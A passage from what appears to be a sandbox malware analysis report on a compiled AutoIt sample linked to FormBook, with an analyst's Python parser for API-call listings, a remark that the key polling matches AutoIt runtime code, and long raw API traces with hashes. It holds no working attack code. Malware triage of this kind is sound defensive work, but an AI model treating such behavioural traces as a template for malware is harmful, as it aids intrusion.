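    parts = []
    for tok in call.args:
        v = arg_value(tok)
        if v is not None and call.func in ("GetAsyncKeyState", "GetKeyState"):
            parts.append(VK_NAMES.get(v, f"0x{v:02X}"))
        else:
            parts.append(tok)
    return f"{call.module}!{call.func}({', '.join(parts)}) @ rva 0x{call.rva:X}"


def keys_polled(calls) -> set[str]:
    """Virtual keys the function polls through GetAsyncKeyState/GetKeyState."""
    out = set()
    for c in calls:
        if c.func in ("GetAsyncKeyState", "GetKeyState") and c.args:
            v = arg_value(c.args[0])
            if v is not None:
                out.add(VK_NAMES.get(v, f"0x{v:02X}"))
    return out


def api_summary(calls) -> list[str]:
    """Ordered, de-duplicated API names, comparable to the report's 'API ID'."""
    seen: list[str] = []
    for c in calls:
        if c.func not in seen:
            seen.append(c.func)
    return seen


# Constructed sample: lines copied from the listing on this page.
SAMPLE = """\
• GetKeyboardState.USER32(?), ref: 00842ED6
• SetKeyboardState.USER32(?), ref: 00842F41
• GetAsyncKeyState.USER32(000000A0), ref: 00842F61
• GetKeyState.USER32(000000A0), ref: 00842F78
• GetAsyncKeyState.USER32(00000011), ref: 00842FE4
• GetAsyncKeyState.USER32(0000005B), ref: 00843052
  • Part of subcall function 0081B9FF: InvalidateRect.USER32(?,00000000,00000001), ref: 0081BA58
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0083EE8E
• _wcscpy.LIBCMT ref: 0084D8C2
"""

if __name__ == "__main__":
    for call in parse_listing(SAMPLE):
        print(describe(call))
    print("keys polled:", sorted(keys_polled(parse_listing(SAMPLE))))
```

Reading GetAsyncKeyState on its own does not establish a keylogger: the function above polls only the modifier keys (Shift, Ctrl, Alt, Win) around a GetKeyboardState/SetKeyboardState pair, which is consistent with the AutoIt runtime's own keystroke-synthesis code (the report classifies the sample as a compiled AutoIt script). Treat it as runtime context and look for the injected FormBook stage elsewhere in the listing.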
                                            APIs
                                            • GetDlgItem.USER32(?,00000001), ref: 0083ED1E
                                            • GetWindowRect.USER32(00000000,?), ref: 0083ED30
                                            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0083ED8E
                                            • GetDlgItem.USER32(?,00000002), ref: 0083ED99
                                            • GetWindowRect.USER32(00000000,?), ref: 0083EDAB
                                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0083EE01
                                            • GetDlgItem.USER32(?,000003E9), ref: 0083EE0F
                                            • GetWindowRect.USER32(00000000,?), ref: 0083EE20
                                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0083EE63
                                            • GetDlgItem.USER32(?,000003EA), ref: 0083EE71
                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0083EE8E
                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0083EE9B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Window$ItemMoveRect$Invalidate
                                            • String ID:
                                            • API String ID: 3096461208-0
                                            • Opcode ID: c5f692947655d342cc7498233b03e519ecd033b6329cee6dc1006e28ed39f19b
                                            • Instruction ID: 554dfee4bf40d9b847a8b538c39b8f1f96d9edfe2fe48cb32dabf1e2e8234d8f
                                            • Opcode Fuzzy Hash: c5f692947655d342cc7498233b03e519ecd033b6329cee6dc1006e28ed39f19b
                                            • Instruction Fuzzy Hash: 8B51FCB1B00209AFDB18DF6DDD85AAEBBBAFB98710F148129F519D72D0E7709D008B50
                                            APIs
                                              • Part of subcall function 0081B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0081B759,?,00000000,?,?,?,?,0081B72B,00000000,?), ref: 0081BA58
                                            • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0081B72B), ref: 0081B7F6
                                            • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0081B72B,00000000,?,?,0081B2EF,?,?), ref: 0081B88D
                                            • DestroyAcceleratorTable.USER32(00000000), ref: 0087D8A6
                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0081B72B,00000000,?,?,0081B2EF,?,?), ref: 0087D8D7
                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0081B72B,00000000,?,?,0081B2EF,?,?), ref: 0087D8EE
                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0081B72B,00000000,?,?,0081B2EF,?,?), ref: 0087D90A
                                            • DeleteObject.GDI32(00000000), ref: 0087D91C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                            • String ID:
                                            • API String ID: 641708696-0
                                            • Opcode ID: bd1b5eee8ae705f3304338356ab6ed7af00cf99cb69f9661183e7f1a14c52e28
                                            • Instruction ID: 167102d00c5f50ca753de43924a86a58785f9e10689a38986a15ebaf34671083
                                            • Opcode Fuzzy Hash: bd1b5eee8ae705f3304338356ab6ed7af00cf99cb69f9661183e7f1a14c52e28
                                            • Instruction Fuzzy Hash: 8E618A30500705CFDB259F18D988FA5BBF9FFA5726F14892DE14AC6AA4C730A8D0DB81
                                            APIs
                                              • Part of subcall function 0081B526: GetWindowLongW.USER32(?,000000EB), ref: 0081B537
                                            • GetSysColor.USER32(0000000F), ref: 0081B438
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ColorLongWindow
                                            • String ID:
                                            • API String ID: 259745315-0
                                            • Opcode ID: ea00d98cd91392fd622ab6ef28dc3ad4f1eed28afc87b49708c9376b625f5191
                                            • Instruction ID: 4e82925f5d6e5874771c0f6a4109a4c1a17a9185211617ac6ea0089716238367
                                            • Opcode Fuzzy Hash: ea00d98cd91392fd622ab6ef28dc3ad4f1eed28afc87b49708c9376b625f5191
                                            • Instruction Fuzzy Hash: 54418C35100244ABDF216F68D889BF93B6AFF56731F188261F965CA1E6D7308C81DB25
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                            • String ID:
                                            • API String ID: 136442275-0
                                            • Opcode ID: d191b02bf16b7361763a24a0b9ed5b67f71579d2b61eb0ac8ba63cc25b39c1dc
                                            • Instruction ID: 375e8e053c5b9bae168059edb846f13d9045ba29ac609120205aa4f9238c59e9
                                            • Opcode Fuzzy Hash: d191b02bf16b7361763a24a0b9ed5b67f71579d2b61eb0ac8ba63cc25b39c1dc
                                            • Instruction Fuzzy Hash: 00410C7684512CAFCF61EA94DC85DCA73BCFB44310F0041A7B659E2151EA70ABE48F56
                                            APIs
                                            • CharLowerBuffW.USER32(0089DC00,0089DC00,0089DC00), ref: 0084D7CE
                                            • GetDriveTypeW.KERNEL32(?,008B3A70,00000061), ref: 0084D898
                                            • _wcscpy.LIBCMT ref: 0084D8C2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: BuffCharDriveLowerType_wcscpy
                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                            • API String ID: 2820617543-1000479233
                                            • Opcode ID: 198e4aae6ae55d30e862af51551c024f772a9fcf126b34cc5f6cd123a84c92c4
                                            • Instruction ID: 8a3d26515655a03d8cec18eee7a5aaf3c9d6084e330a1991471d0b25a106d770
                                            • Opcode Fuzzy Hash: 198e4aae6ae55d30e862af51551c024f772a9fcf126b34cc5f6cd123a84c92c4
                                            • Instruction Fuzzy Hash: 87516235114309AFC710EF18DC91AAEB7A5FF94314F20892DF99AD72A2DB31DD49CA42
                                            APIs
                                            • __swprintf.LIBCMT ref: 008093AB
                                            • __itow.LIBCMT ref: 008093DF
                                              • Part of subcall function 00821557: _xtow@16.LIBCMT ref: 00821578
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: __itow__swprintf_xtow@16
                                            • String ID: %.15g$0x%p$False$True
                                            • API String ID: 1502193981-2263619337
                                            • Opcode ID: 8be6dabbb6b0ff8e6024bd4db12bdb59531223a55fb7c7d74226489b3d991fc9
                                            • Instruction ID: 08ac36fc73df00978151f9baed946e28548d9bae349a78d01a8d4207a40f254d
                                            • Opcode Fuzzy Hash: 8be6dabbb6b0ff8e6024bd4db12bdb59531223a55fb7c7d74226489b3d991fc9
                                            • Instruction Fuzzy Hash: 7941B371504208AFDB64DF78DD42EAA73E8FF84304F20946AE58AD72D6EB31D981CB51
                                            APIs
                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0086A259
                                            • CreateCompatibleDC.GDI32(00000000), ref: 0086A260
                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0086A273
                                            • SelectObject.GDI32(00000000,00000000), ref: 0086A27B
                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0086A286
                                            • DeleteDC.GDI32(00000000), ref: 0086A28F
                                            • GetWindowLongW.USER32(?,000000EC), ref: 0086A299
                                            • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0086A2AD
                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0086A2B9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                            • String ID: static
                                            • API String ID: 2559357485-2160076837
                                            • Opcode ID: 262439434a3ba723bcd651b264d32b64224712b62918d222a190fd991d84aafb
                                            • Instruction ID: d324b428debfd1569f5c7b396dfdd53ed87f3f96086f2b2fdfc426330f83583d
                                            • Opcode Fuzzy Hash: 262439434a3ba723bcd651b264d32b64224712b62918d222a190fd991d84aafb
                                            • Instruction Fuzzy Hash: 17318B31140218ABDF259FA8DC49FEA3B69FF1A364F110214FA19E61E0C736D811DBA5
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                            • String ID: 0.0.0.0
                                            • API String ID: 2620052-3771769585
                                            • Opcode ID: 56c8912ce9817b5e69357c9bc3a8419ef936ae13a7dec5aa9a82aa1c9851cc64
                                            • Instruction ID: 417216a83ad0b606d4a9cad981f4c55093ed82ca059303bd64c000257d052f44
                                            • Opcode Fuzzy Hash: 56c8912ce9817b5e69357c9bc3a8419ef936ae13a7dec5aa9a82aa1c9851cc64
                                            • Instruction Fuzzy Hash: 6E11E47150421CAFDB24BB68AC4AEDA77ACFF41710F040166F145E6092FF74AE858B52
                                            APIs
                                            • _memset.LIBCMT ref: 00825047
                                              • Part of subcall function 00827C0E: __getptd_noexit.LIBCMT ref: 00827C0E
                                            • __gmtime64_s.LIBCMT ref: 008250E0
                                            • __gmtime64_s.LIBCMT ref: 00825116
                                            • __gmtime64_s.LIBCMT ref: 00825133
                                            • __allrem.LIBCMT ref: 00825189
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008251A5
                                            • __allrem.LIBCMT ref: 008251BC
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008251DA
                                            • __allrem.LIBCMT ref: 008251F1
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0082520F
                                            • __invoke_watson.LIBCMT ref: 00825280
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                            • String ID:
                                            • API String ID: 384356119-0
                                            • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                            • Instruction ID: fd6827e5cd5464d3be0c61d59cdecb92c24db60889d50650e6dc3eae08bf1fe1
                                            • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                            • Instruction Fuzzy Hash: 7C71D672A41F26ABE714AE7DDC41B6A77A8FF44764F144229F810D62C1E770DD808BD1
                                            APIs
                                            • _memset.LIBCMT ref: 00844DF8
                                            • GetMenuItemInfoW.USER32(008C1708,000000FF,00000000,00000030), ref: 00844E59
                                            • SetMenuItemInfoW.USER32(008C1708,00000004,00000000,00000030), ref: 00844E8F
                                            • Sleep.KERNEL32(000001F4), ref: 00844EA1
                                            • GetMenuItemCount.USER32(?), ref: 00844EE5
                                            • GetMenuItemID.USER32(?,00000000), ref: 00844F01
                                            • GetMenuItemID.USER32(?,-00000001), ref: 00844F2B
                                            • GetMenuItemID.USER32(?,?), ref: 00844F70
                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00844FB6
                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00844FCA
                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00844FEB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                            • String ID:
                                            • API String ID: 4176008265-0
                                            • Opcode ID: a88bf70cbe33a794fe9340eb4084c0bb8ec83e7b783717394e035c52934d89c8
                                            • Instruction ID: 050f1ff974c9073b6ab6285423c9bcbdac11b3782f645026160db5d75263c38e
                                            • Opcode Fuzzy Hash: a88bf70cbe33a794fe9340eb4084c0bb8ec83e7b783717394e035c52934d89c8
                                            • Instruction Fuzzy Hash: 7561907190024DAFDF11CFA8D888EAE7BB8FB01308F14115AF841E7291DB31AD49CB21
                                            APIs
                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00869C98
                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00869C9B
                                            • GetWindowLongW.USER32(?,000000F0), ref: 00869CBF
                                            • _memset.LIBCMT ref: 00869CD0
                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00869CE2
                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00869D5A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend$LongWindow_memset
                                            • String ID:
                                            • API String ID: 830647256-0
                                            • Opcode ID: 82c405840f52630a57ff4455bc1f73d0c3c05fea1d8d495909869be4103ddbe7
                                            • Instruction ID: 35b841d2c1531b86d7fe02e3cee5db52e59a2f4cd02e63deef684114f6cf6d16
                                            • Opcode Fuzzy Hash: 82c405840f52630a57ff4455bc1f73d0c3c05fea1d8d495909869be4103ddbe7
                                            • Instruction Fuzzy Hash: F8617A75A00208AFDB10DFA8CC81EEEB7B8FB09714F154169FA54E72D2D774A941DB50
                                            APIs
                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 008394FE
                                            • SafeArrayAllocData.OLEAUT32(?), ref: 00839549
                                            • VariantInit.OLEAUT32(?), ref: 0083955B
                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 0083957B
                                            • VariantCopy.OLEAUT32(?,?), ref: 008395BE
                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 008395D2
                                            • VariantClear.OLEAUT32(?), ref: 008395E7
                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 008395F4
                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008395FD
                                            • VariantClear.OLEAUT32(?), ref: 0083960F
                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0083961A
                                            Similarity
                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                            • String ID:
                                            • API String ID: 2706829360-0
                                            • Opcode ID: adffedcb94437308337d75df4c5d10665fd878cd34e2315212861d9b8d28e60d
                                            • Instruction ID: 1d3228dc9b466692b036e249587ce70a184fd17999c258b3fadaf5855b869e9a
                                            • Opcode Fuzzy Hash: adffedcb94437308337d75df4c5d10665fd878cd34e2315212861d9b8d28e60d
                                            • Instruction Fuzzy Hash: E9414C31900219EFCF01EFA8D8849DEBB79FF48354F008069E542E7261DB70EA85CBA5
                                            APIs
                                              • Part of subcall function 0080936C: __swprintf.LIBCMT ref: 008093AB
                                              • Part of subcall function 0080936C: __itow.LIBCMT ref: 008093DF
                                            • CoInitialize.OLE32 ref: 0085ADF6
                                            • CoUninitialize.OLE32 ref: 0085AE01
                                            • CoCreateInstance.OLE32(?,00000000,00000017,0088D8FC,?), ref: 0085AE61
                                            • IIDFromString.OLE32(?,?), ref: 0085AED4
                                            • VariantInit.OLEAUT32(?), ref: 0085AF6E
                                            • VariantClear.OLEAUT32(?), ref: 0085AFCF
                                            Strings
                                            Similarity
                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                            • API String ID: 834269672-1287834457
                                            • Opcode ID: a6399038a65ca8245457aa24bec0efeb9584d62947f0d246942a0539317ddafb
                                            • Instruction ID: 114fd3cafe0701915cf150c38e41a66a50ac4bb04775b0542a9e3a7d6ee9c9ca
                                            • Opcode Fuzzy Hash: a6399038a65ca8245457aa24bec0efeb9584d62947f0d246942a0539317ddafb
                                            • Instruction Fuzzy Hash: 5B617A712083119FC714EF58C889A6ABBE8FF48715F004A19F985DB292CB70ED48CB93
                                            APIs
                                            • WSAStartup.WSOCK32(00000101,?), ref: 00858168
                                            • inet_addr.WSOCK32(?,?,?), ref: 008581AD
                                            • gethostbyname.WSOCK32(?), ref: 008581B9
                                            • IcmpCreateFile.IPHLPAPI ref: 008581C7
                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00858237
                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0085824D
                                            • IcmpCloseHandle.IPHLPAPI(00000000), ref: 008582C2
                                            • WSACleanup.WSOCK32 ref: 008582C8
                                            Strings
                                            Similarity
                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                            • String ID: Ping
                                            • API String ID: 1028309954-2246546115
                                            • Opcode ID: 0ccbc3fc3c1fbae8998116d25995f7c3dee95cb9e7677f4604aa463c4ce65daa
                                            • Instruction ID: 62938851ac504f8ca109cd87804d55f62cbb56aad9f3825f244d98e9e4638ecc
                                            • Opcode Fuzzy Hash: 0ccbc3fc3c1fbae8998116d25995f7c3dee95cb9e7677f4604aa463c4ce65daa
                                            • Instruction Fuzzy Hash: A6518F316047049FD720AF68CC45B6ABBE5FF48711F04895AFA99E72E1DB70E849CB42
                                            APIs
                                            • SetErrorMode.KERNEL32(00000001), ref: 0084E396
                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0084E40C
                                            • GetLastError.KERNEL32 ref: 0084E416
                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 0084E483
                                            Strings
                                            Similarity
                                            • API ID: Error$Mode$DiskFreeLastSpace
                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                            • API String ID: 4194297153-14809454
                                            • Opcode ID: 50455d62fc990e02220b5cffe4a5bae2c58798727dc146772c804b0e41a41bb3
                                            • Instruction ID: 0452d34ee7c2bbb0b0e72c44c54c4e12e2c0e6c4f32b5420401427d2e1cd16bf
                                            • Opcode Fuzzy Hash: 50455d62fc990e02220b5cffe4a5bae2c58798727dc146772c804b0e41a41bb3
                                            • Instruction Fuzzy Hash: 88318F35A0060DAFDB01EFA8CD95AADBBB4FF08304F148025E505EB2D1DB74AA01CB96
                                            APIs
                                            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0083B98C
                                            • GetDlgCtrlID.USER32 ref: 0083B997
                                            • GetParent.USER32 ref: 0083B9B3
                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 0083B9B6
                                            • GetDlgCtrlID.USER32(?), ref: 0083B9BF
                                            • GetParent.USER32(?), ref: 0083B9DB
                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 0083B9DE
                                            Strings
                                            Similarity
                                            • API ID: MessageSend$CtrlParent
                                            • String ID: ComboBox$ListBox
                                            • API String ID: 1383977212-1403004172
                                            • Opcode ID: 3c5e659022b2a0b1f8593d4545175c52d0571e6f48294bec197d367a25a097d5
                                            • Instruction ID: c57ee32371bb1f588a04210fda3a1b0e581c82fc665eb8590f289f17043b36de
                                            • Opcode Fuzzy Hash: 3c5e659022b2a0b1f8593d4545175c52d0571e6f48294bec197d367a25a097d5
                                            • Instruction Fuzzy Hash: AC2192B4900208AFDB04EFA8DC96EBEBB75FB95310F100215FA51D72E1EB7458159BA0
                                            APIs
                                            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0083BA73
                                            • GetDlgCtrlID.USER32 ref: 0083BA7E
                                            • GetParent.USER32 ref: 0083BA9A
                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 0083BA9D
                                            • GetDlgCtrlID.USER32(?), ref: 0083BAA6
                                            • GetParent.USER32(?), ref: 0083BAC2
                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 0083BAC5
                                            Strings
                                            Similarity
                                            • API ID: MessageSend$CtrlParent
                                            • String ID: ComboBox$ListBox
                                            • API String ID: 1383977212-1403004172
                                            • Opcode ID: 9f5e3de639205310f89d31065213fef93de88c9cfdc94c05c5dcd6ad66a1f2fc
                                            • Instruction ID: 149f0038fcf3566681a5581f423d01f3d929245e99e82c36c88367e54862f902
                                            • Opcode Fuzzy Hash: 9f5e3de639205310f89d31065213fef93de88c9cfdc94c05c5dcd6ad66a1f2fc
                                            • Instruction Fuzzy Hash: EB21B0B4A00208AFDB00EF68CC85EFEBB74FB44300F000115F951D72D1EB7958159BA0
                                            APIs
